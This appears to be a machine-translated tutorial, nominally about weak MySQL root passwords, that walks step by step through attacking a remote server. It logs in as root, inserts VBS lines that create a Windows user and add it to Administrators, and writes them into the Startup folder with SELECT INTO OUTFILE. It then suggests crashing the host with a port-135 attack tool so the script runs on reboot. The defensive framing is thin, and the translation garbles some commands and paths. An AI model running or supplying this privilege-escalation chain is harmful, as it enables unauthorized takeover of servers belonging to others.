The article introduces about preventing MySQL user root password weak password attack, we can see their MySQL root is also a security risk.
1, connect to each other MySQL server
Mysql-u root-h 192.168.0.1
Mysql.exe This program is in the bin directory where you have MySQL installed.
2. Let's take a look at some of the databases in the server
Mysql>show databases; MySQL default installation will have MySQL, test these two databases, if you see that there are other databases is user-built database.
3, let us enter the database
Mysql>use test; We will enter the test database.
4. See what data tables we get into the database
Mysql>show tables; By default, no table exists in test.
The following are the key parts
5. Create a new table under test database;
Mysql>create Table A (cmd text); Well, we created a new table named A, which only holds one field in the table, the field name is cmd, and the text.
6, insert content in the table
Mysql>insert into a values ("Set Wshshell=createobject (" "Wscript.Shell") ");
Mysql>insert into a values ("A=wshshell.run (" "cmd.exe/c net User 1 1/add" ", 0)");
Mysql>insert into a values
("B=wshshell.run (" "Cmd.exe/c net localgroup Administrators 1/add" ", 0)");
Note the double quotes and parentheses and the "0" in the back must be entered! We will use these three commands to create a VBS script! 7, OK, now let's see what's in Table A
Mysql>select * from A; we will see that there are three rows of data in the table, that is, what we just typed, confirm what you typed, and we'll come to the next step.
8, the output table is a VBS script file
Mysql>select * from A to outfile "c:docume~1alluse~1 Start" menu program start A.vbs "; We entered the contents of our table into the Startup group, a script file for VBS! Note the symbol.
9, see this everyone must know, is the use of MySQL output an executable file. Why not bat, because the start of the runtime will have a clear DOS window, and the VBS script can completely hide the window without error prompts! Originally, there should be a sentence after the completion of the script automatically deleted this script, but the Chinese directory is really unable to deal with, only to forget! All right, find a tool to attack 135 and let the server reboot, and in a few minutes you'll be the administrator.
Summary: No matter when you need to pay attention to the security of their own server or not to talk about other applications, this article describes the MySQL root password weak password attack is only a security application of the iceberg one solution.